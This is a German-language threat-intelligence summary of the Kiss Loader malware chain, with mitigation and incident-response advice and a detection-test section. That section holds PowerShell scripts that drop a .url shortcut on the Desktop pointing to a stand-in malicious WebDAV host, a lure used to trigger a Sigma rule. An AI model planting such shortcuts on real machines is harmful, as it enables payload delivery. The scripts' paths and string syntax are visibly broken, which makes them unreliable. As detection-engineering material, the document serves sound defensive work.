Wenn Malware zurück antwortet: Echtzeit-Interaktion mit einem Bedrohungsakteur während der Analyse von Kiss Loader

Zusammenfassung

Forschung durch G DATA Security Center untersucht einen neu identifizierten Loader namens Kiss Loader. Der Artikel untersucht einen neu identifizierten Loader namens Kiss Loader, der durch eine Windows-Verknüpfung verteilt wird, die auf ein über einen TryCloudflare-Tunnel exponiertes WebDAV-Repository verweist. Sobald er gestartet wird, entschlüsselt der Loader Donut-generierten Shellcode, ruft Nutzlasten wie VenomRAT und eine Kryptik-Komponente ab und führt diese durch Early Bird APC-Injektion in explorer.exeaus. Während der Analyse erlebte der Forscher eine direkte Interaktion mit dem Malware-Operator über ein Notepad-Fenster, das die Verwendung der Early Bird-Injektionsmethode bestätigte. Der Fall unterstreicht die schnelle Entwicklung des Tools und die Notwendigkeit einer starken Eindämmung beim Umgang mit aktiver Malware.

Untersuchung

Forscher zündeten die initiale Verknüpfung in einem kontrollierten Labor und verfolgten die Ausführungskette durch ein WSH-Skript, ein JScript-Komponente, Batch-Dateien und einen Python-basierten Loader. Sie bestätigten die Verwendung von Donut-generiertem Shellcode, extrahierten die eingebetteten Nutzlasten und dokumentierten die finale Injektionsmethode, die einen APC in einen angehaltenen explorer.exe Prozess einreiht. Während der Sitzung erfasste das Team detaillierte Laufzeitausgaben und Entwicklernachrichten, die im Malware-Fluss hinterlassen wurden. Ein kurzer Echtzeitaustausch mit dem Operator bestätigte zusätzlich sowohl die Technik als auch den aktiven Entwicklungszustand des Loaders.

Abschwächung

Organisationen sollten den WebDAV-Verkehr, der über öffentliche Tunneling-Plattformen wie TryCloudflare bereitgestellt wird, einschränken oder inspizieren, die automatische Ausführung von .url Verknüpfungsdateien deaktivieren und strikte Ausführungskontrollen für Skripte und Batch-Dateien in benutzerzugänglichen Startpfaden anwenden. Endpunkt-Abwehrmechanismen sollten das Verhalten der Early Bird APC-Injektion erkennen und auf angehaltene Prozesse achten, die eingereihte APCs erhalten. Anwendungserlaubnislisten sollten ebenfalls aktuell gehalten werden, um unbekannte Python-Loader und Donut-basierte Shellcodes zu blockieren.

Antwort

Wenn Kiss Loader-Aktivitäten erkannt werden, isolieren Sie sofort den Endpunkt, beenden Sie alle verdächtigen explorer.exe Prozesse, die in einem angehaltenen Zustand gestartet wurden, und erfassen Sie den Speicher zur forensischen Überprüfung. Die Ermittler sollten die zugehörige WebDAV-Infrastruktur identifizieren und blockieren, den Host auf VenomRAT, Kryptik und alle zusätzlich abgelegten Nutzlasten scannen und potenziell gefährdete Anmeldedaten rotieren. Protokolle sollten dann auf weitere Einbruchsversuche überprüft und Erkennungsregeln mit allen neu beobachteten Indikatoren aktualisiert werden.

Simulation-Ausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorflug-Check muss bestanden sein.

• Angriffserzählung & Befehle:
  Ein Angreifer mit begrenztem Zugang zum Opfer-Arbeitsplatz möchte eine Basis für laterale Bewegung schaffen. Sie erstellen eine bösartige Windows-Internetverknüpfung namens DKM_DE000922.pdf.url die auf ein bösartiges WebDAV-Share verweist (http://malicious.example.com/webdav/evil.pdf). Wenn ein Benutzer die Verknüpfung doppelklickt, versucht das System automatisch das WebDAV-Resource zu mounten, wodurch das Opfer die Nutzlast herunterlädt, ohne eine traditionelle Binärdatei auszuführen. Die Erstellung dieser Verknüpfung erzeugt ein Datei-Erstellungsereignis, das der Erkennungsregel entspricht.

  powershell
  # Pfad, wo die Verknüpfung abgelegt wird (z.B. Desktop des Benutzers)
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # Inhalt der bösartigen .url-Datei, die auf ein WebDAV-Share verweist
  $maliciousContent = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 „@

  # Datei schreiben – diese Aktion sollte die Erkennungsregel auslösen
  Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII
  

• Regressionstest-Skript: Das folgende Skript reproduziert die genauen Schritte, die erforderlich sind, um die detektionsauslösende Telemetrie zu erzeugen.

  powershell
  # ---------------------------------------------------------
  # Regressionstest – Sigma-Regel für WebDAV .url-Dateien auslösen
  # ---------------------------------------------------------
  
  # 1. Zielort definieren (Desktop des aktuellen Benutzers)
  $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # 2. Bösartige Verknüpfungsinhalte erstellen
  $urlPayload = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 „@

  # 3. Verknüpfung schreiben (dies löst ein FileCreate-Ereignis aus)
  Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII
  
  Write-Host "Bösartige .url-Verknüpfung bei $targetFile erstellt"
  

• Bereinigungskommandos: Entfernen Sie die bösartige Verknüpfung nach der Verifizierung.

  powershell
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  if (Test-Path $maliciousPath) {
      Remove-Item -Path $maliciousPath -Force
      Write-Host "Bösartige Verknüpfung bereinigt."
  } else {
      Write-Host "Keine bösartige Verknüpfung gefunden; nichts zu bereinigen."
  }